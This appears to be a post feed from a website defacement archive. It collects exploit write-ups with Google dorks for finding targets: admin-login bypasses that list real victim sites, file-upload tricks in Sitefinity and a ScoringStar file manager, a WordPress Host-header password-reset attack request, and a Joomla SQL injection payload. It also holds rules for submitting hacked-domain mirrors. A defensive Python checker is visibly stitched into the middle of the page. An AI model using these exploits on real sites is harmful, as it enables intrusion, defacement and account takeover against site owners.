Bypass Admin WebositeZ [Noredirect]

[-] Title : Bypass Admin WebositeZ [Noredirect]
[-] Credit : Magelang1337
[-] Vendor : https://webositez.com/
[-] Date : 19-1-2018
[-] Dork 1 :"Design By WebositeZ"
[-] Dork 2 : "Powered By WebositeZ"
[-]
========================================================================

[-]
[-] Admin page : target.com/webcms/login.php or target.com/admin/login.php
[-] Note: Sometimes the admin page displays a 404 not found. It's not a matter of can still be
[-]
[-] POC : Use Addons Noredirect [Mozilla]
[-] target.com/webcms/index.php or target.com/login/index.php
[-]
[-] Demo : http://www.raynesparkcourt.com/admin/login.php
[-]
[-]
[-] Sh0ut : nginxDEX - Codename - AlldefacerIndonesia


Reference : [http://www.magelang1337.com/2018/01/bypass-admin-webositez-noredirect.html](http://www.magelang1337.com/2018/01/bypass-admin-webositez-noredirect.html "bypassadmin")


written by nginxDEX 3 months, 1 week ago

Sitefinity file upload vulnerability

Exploit title: sitefinity file upload vulnerability


#Dork>>>>>>>  : inurl:/sitefinity/login.aspx
#Exploit>>>> : sitefinity/usercontrols/dialogs/documenteditordialog.aspx
###########################################################################
>>[search Dork]<<inurl:/sitefinity/login.aspx
>>[choose a website]<<
>>[exploit poc] <<http://site.target/sitefinity/usercontrols/dialogs/documenteditordialog.aspx
>>[upload script]<<
>>[call the script after upload]<< http://site.target/file/namafile.htm
###########################################################################
(Check the sites one by one. The sign that a site is not vulnerable: after you enter the exploit, the upload field does not appear... ok)
###########################################################################
**created by >>T-1
**Team>>> Beginner Conference


written by T-1 4 months ago

chat #new feature

Chat is available now!


Enjoy!


written by masculan 4 months ago

Admin Page Noredirect [softventurs]


# Exploit Title: Admin Page Noredirect [softventurs]
# Author : Magelang1337
# Google Dork 1 : Developed by Softventurs
# Google Dork 2 : Designed By - softventurs
# Google Dork 3 : Powered By - softventurs
# Date : 21.12.2017
# Vendor Home: http://www.softventurs.in
# Tested On Mozilla Firefox
#################################################################################

Tutorial :

[+] Download Addons "Noredirect" [Mozilla]
[+] insert admin page >> http://gauravbooks.com/admin/ to Addons Mozilla [Noredirect]
[+] Open new tab on Mozilla >> http://gauravbooks.com/admin/main.php

Demo :


::: Magelang1337 ~ All defacer indonesia
#################################################################################


written by nginxDEX-MnHBlog 4 months ago

ScoringStar.com- CMS Filemanager


# Exploit Title : ScoringStar.com- CMS Filemanager
# Dorks : CMS/Filemanager/index.html "ScoringStar.com"
# Exploit Author: **[Magelang1337]**
#################################################
# SEARCH DORKS > CMS/Filemanager/index.html "ScoringStar.com"
# EXPLOIT POC : www.site.target/CMS/Filemanager/index.html
# UPLOAD YOUR FILE
# EXAMPLE : File.txt [Rename Your File Ext. Html/PhP and bypass etc]
# FILE : Use Ur Brain :D
# DEMO : ....
# http://voiceofcricketers.com/
# http://rockingroyals.scoringstar.com
# Greetz : all indonesia defacer
#################################################


written by nginxDEX-MnHBlog 4 months, 2 weeks ago

Vietnam Dns Hijacked

Vietnam Dns Hijacked by jrb team.


look for more:


mirrors of jrb team


written by masculan 5 months, 2 weeks ago

teams #new feature

teams feature is active now, enjoy!


written by masculan 7 months, 3 weeks ago

WordPress < 4.7.4 - Unauthorized Password Reset


=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------

Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:

------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <[email protected]>
From: WordPress <[email protected]>
Message-ID: <[email protected]>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------

As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.

The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:

#!/bin/bash
cat > /tmp/outgoing-email


written by T3kfurD4GLi 7 months, 4 weeks ago
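
How the Host header in the request above ends up in the reset mail's sender, and a server-side check that rejects the mismatch, as an added example that is not part of the post or the quoted advisory. `ALLOWED_HOSTS`, the function names and the sample requests are assumptions constructed for illustration; `sender_for` models WordPress's default sender of `wordpress@` plus SERVER_NAME.

```python
from urllib.parse import parse_qs

ALLOWED_HOSTS = {"companyx-wp"}  # assumption: the hostname(s) the site really serves

def build_request(host):
    """Constructed sample: the lostpassword POST from the post, with a chosen Host."""
    body = "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
    return "\r\n".join([
        "POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "", body])

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target and lower-cased headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def sender_for(server_name):
    """Model of the default sender: 'wordpress@' + SERVER_NAME, leading 'www.' dropped."""
    name = server_name.lower()
    return "wordpress@" + (name[4:] if name.startswith("www.") else name)

def check_reset_request(raw, allowed=ALLOWED_HOSTS):
    """Flag password-reset requests whose Host is not one the site serves."""
    method, target, headers = parse_request(raw)
    path, _, query = target.partition("?")
    is_reset = (method == "POST" and path.endswith("/wp-login.php")
                and parse_qs(query).get("action") == ["lostpassword"])
    host = headers.get("host", "").lower().split(":")[0]  # drop any :port
    return {"is_reset": is_reset, "host": host,
            "sender_if_trusted": sender_for(host),
            "reject": is_reset and host not in allowed}

if __name__ == "__main__":
    for h in ("injected-attackers-mxserver.com", "companyX-wp"):
        print(check_reset_request(build_request(h)))
```

The same allowlist comparison works as a detection rule over access logs that record the Host header alongside the request line.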

Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection


# Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
# Dork: N/A
# Date: 02.08.2017
# Vendor : http://joomlashowroom.com/
# Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
# Demo: http://demo3.joomlashowroom.com/
# Version: 4.1.3
# # # # #
# Author: Ihsan Sencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
# -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)[email protected]:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
# Etc..
# # # # #


written by ane 8 months, 3 weeks ago

Site User Guide

zone-add


* If the notifier username is not in the index, the mirror is not approved.


* Unapproved mirrors are automatically deleted after a week.


* A domain can be hacked once a year.


* Max 20 subdomains of a domain can be hacked.


* You can send 20 mass mirrors at once.


* You can send a mirror without a member.


* You can register and send an exploit.


Thank you for choosing us.


                                                                             zone-add.org


written by T3kfurD4GLi 9 months, 2 weeks ago

zone-add.org © All rights reserved